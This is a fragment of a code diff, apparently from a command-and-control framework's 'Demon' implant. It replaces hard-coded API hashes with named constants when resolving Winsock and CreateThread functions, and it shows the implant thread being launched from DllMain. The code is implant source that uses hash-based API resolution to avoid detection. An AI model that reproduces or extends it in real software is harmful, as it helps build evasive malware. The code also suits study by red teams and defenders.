Instance.Win32.WSAStartup = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x6128c683 );
Instance.Win32.WSACleanup = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7f1aab78 );
Instance.Win32.WSASocketA = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x559f159a );
Instance.Win32.ioctlsocket = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x6dcd609 );
Instance.Win32.bind = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7c9499e2 );
Instance.Win32.listen = LdrFunctionAddr( Instance.Modules.Ws2_32, 0xb794014 );
Instance.Win32.accept = LdrFunctionAddr( Instance.Modules.Ws2_32, 0xf15ae9b5 );
Instance.Win32.closesocket = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x494cb104 );
Instance.Win32.recv = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7c9d4d95 );
Instance.Win32.send = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7c9ddb4f );
Instance.Win32.connect = LdrFunctionAddr( Instance.Modules.Ws2_32, 0xd3764dcf );
Instance.Win32.WSAStartup = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_WSAStartup );
Instance.Win32.WSACleanup = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_WSACleanup );
Instance.Win32.WSASocketA = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_WSASocketA );
Instance.Win32.ioctlsocket = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_ioctlsocket );
Instance.Win32.bind = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_bind );
Instance.Win32.listen = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_listen );
Instance.Win32.accept = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_accept );
Instance.Win32.closesocket = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_closesocket );
Instance.Win32.recv = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_recv );
Instance.Win32.send = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_send );
Instance.Win32.connect = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_connect );
PUTS( "Loaded Ws2_32 functions" )
}
payloads/Demon/Source/Main/MainDll.c
+2 -3
View File
@@ -40,9 +40,8 @@ BOOL WINAPI DllMain( HINSTANCE hDllBase, DWORD Reason, LPVOID Reserved )
LPVOID,
DWORD,
LPDWORD
) = LdrFunctionAddr( Kernel32, 0x7f08f451 ); /* this hash is for CreateThread in Kernel32.
* you can load another function here using
* LdrModulePeb or LdrModuleLoad then LdrFunctionAddr */
) = LdrFunctionAddr( Kernel32, FuncHash_CreateThread ); /* you can load another function here using
* LdrModulePeb or LdrModuleLoad then LdrFunctionAddr */
NewThread( NULL, 0, DemonMain, hDllBase, 0, NULL );
#endif
payloads/Shellcode/Bin/.gitignore
+2
View File
@@ -0,0 +1,2 @@
*
!.gitignore